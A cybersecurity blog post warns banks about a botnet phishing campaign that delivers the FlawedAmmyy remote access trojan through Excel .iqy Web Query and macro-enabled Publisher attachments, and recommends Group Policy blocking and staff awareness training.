Botnet Targets Banks With Phishing Emails

Cyber-criminals are using a botnet to send phishing emails with the apparent purpose to test a new email attachment type.  Over the course of three weeks starting August 10th, this cyber-gang released seven different types of phishing emails to over 3,000 banks around the world.  They appear to be testing which of these several approaches is most successful at tricking recipients into opening the email attachment.

The attachment itself is also something different – Microsoft Excel Web Query files that use an .iqy extension.  I was not familiar with this file type or what it does, but basically when the file is opened, it opens in Excel, and sends out a call to a web address to download additional “data.”  In this case the data appears to be a remote access trojan (RAT) call FlawedAmmyy.  An example of an IQY attachment from the current campaign follows.

Fortunately, opening this file type spawns two warning messages that the recipient has to agree to before the attachment will open and download the RAT.  Hopefully, that should be enough to prevent this exploit from launching, but often busy workers will just click through without a careful reading of the warnings.  This is the first warning.

If the recipient clicks “Enable” on the first one, then this warning appears.

“Remote data is not accessible.
To access this data Excel needs to start another application.  Some legitimate applications on your computer could be used maliciously to spread viruses or damage your computer.  Only click Yes if you trust the source of the workbook and you want to let the workbook start the application.
Start application “CMD.EXE”?”

Of course clicking Yes will install the RAT.

This campaign also used Microsoft Publisher files with macros enabled.  We have warned about the return of MS Office macro exploits before (Word and Excel Macro Viruses Are Back).  Here again, the recipient has to enable macros for the exploit to run, and receives similar warning messages.

These emails appear to be sales requests, “IMPORTANT Documents” arriving from a major bank, bank related PDF attachments, password-protected ZIP files, fake invoices arriving as a Word .doc attachment, payment advice, and payment notifications.  For a complete look at the phishing email samples see the Barkly article linked below.  Blocking these types of attacks can be accomplished through Group Policy, and the process is outlined in the Barkly article.

If you are the cybersecurity officer at a bank, having a quick cybersecurity awareness lunch and learn session with slides showing the examples from the Barkly post would be another good idea.  This attack variant is appearing more frequently, and evolving into new forms.  Showing your staff examples of the warning messages and email types to guard against is important, too.

More information:



About the Author:

Cybersecurity analyst, pen-tester, trainer, and speaker. Serving small business owners in the St Paul, Minneapolis, and western Wisconsin area since 2001. Cybersecurity and hacking have been a passion of mine since I entered the computer and networking business in 2000. I hold several cybersecurity certifications including Certified Information Systems Security Professional (CISSP), Certified Advanced Security Pratitioner (CASP), and Certified Ethical Hacker (CEH). Other computer industry certifications include A+, Network+ and Microsoft Certified System Engineer (MCSE). As Cybersecurity Analyst at The WyzCo Group, I help our clients experience high levels of security on their computers, networks, and websites. In addition to consulting on security products and services, we also conduct security audits, vulnerability assessments and full penetration tests. We also work with companies and organizations that need to certify compliance with regulations such as PCI-DSS (credit card processing), HIPAA/HITECH (medical records), and GLBA. We also provide Cybersecurity Awareness Training for clients and their employees. I am a frequent speakers at cybersecurity conferences such as the Minnesota Bloggers Conference, Secure360 Security Conference, the (ISC)2 World Congress, and the ISSA International Conference, and many local community organizations, Chambers of Commerce, SCORE, and several school districts. I have been blogging on cybersecurity since 2008.

Add a Comment

This site uses Akismet to reduce spam. Learn how your comment data is processed.